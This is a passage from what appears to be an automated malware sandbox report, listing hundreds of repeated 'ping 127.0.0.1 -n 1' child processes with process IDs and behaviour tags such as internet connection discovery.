  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10856
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10940
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11048
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11104
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11132
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11164
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11184
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11244
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11272
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:11296
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11348
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:11364
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11420
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11448
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11524
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11608
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11636
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11704
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12188
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12068
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12044
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12292
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12392
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12516
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12544
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12568
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12636
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:12712
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12864
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12924
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12948
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12980
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13060
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13100
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13128
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13084
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13184
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13216
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13268
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13364
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:13392
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13424
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13452
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13484
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13500
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13536
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13572
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13596
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13624
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13652
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13676
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13708
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13740
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13764
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13796
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13820
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13872
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13900
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13936
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13976
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:14016
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:14040
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1520
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14104
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14212
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7280
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14256
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:14284
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7332
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2228
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7456
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7508
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:2108
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7576
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2088
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2128
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4548
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5184
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:2164
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5836
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3284
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7424
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4228
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5448
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5416
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5996
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1788
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4248
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5288
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7692
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3400
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6180
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6212
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1864
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6360
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6392
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:5340
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6428
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:14324
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6448
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6480
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6508
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9140
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6612
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6640
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6676
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6704
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6768
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6808
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6832
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6860
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6884
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6916
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6940
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6968
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6996
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7024
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7044
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7072
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3760
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7128
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6088
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7176
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7240
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7372
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7504
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7656
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7684
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7724
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7752
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7780
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7876
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7900
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1180
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8196
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8240
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8252
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8284
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8408
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6520
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8448
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8500
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8504
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8540
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8568
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8592
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8612
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8652
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8688
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8716
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8720
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8764
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8816
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8852
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8892
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8916
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8972
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8884
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9004
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9032
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9064
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9092
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9124
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5316
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:956
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9184
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9236
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9300
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9332
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9256
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9356
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9380
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9420
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9448
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9480
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9504
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9512
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9560
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9600
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8840
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8808
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9636
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9668
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9692
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9736
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9748
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9776
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9796
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9836
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9872
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9892
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9920
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9924
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:10044
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10008
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10080
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10072
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10112
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10172
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10056
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9976
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10224
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10232
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10256
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10292
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10372
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10392
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10408
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10328
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10440
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10468
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10484
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10528
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10568
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10604
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10628
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:10660
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10692
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10552
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10720
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10760
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10792
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10808
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10848
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10880
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10896
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10964
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10956
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11020
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:11116
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11164
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11208
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11240
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5204
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11284
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11308
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11340
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11356
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11380
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11428
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11456
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11488
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11516
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11536
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11580
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11600
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11608
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11636
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11688
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11716
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11736
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11768
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11796
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11824
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11848
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11880
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11912
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11924
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12024
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11920
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11988
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1408
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12268
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12240
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12212
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12176
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12164
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12124
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12096
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12056
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12308
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12408
- C:\Windows\system32\PING.EXE
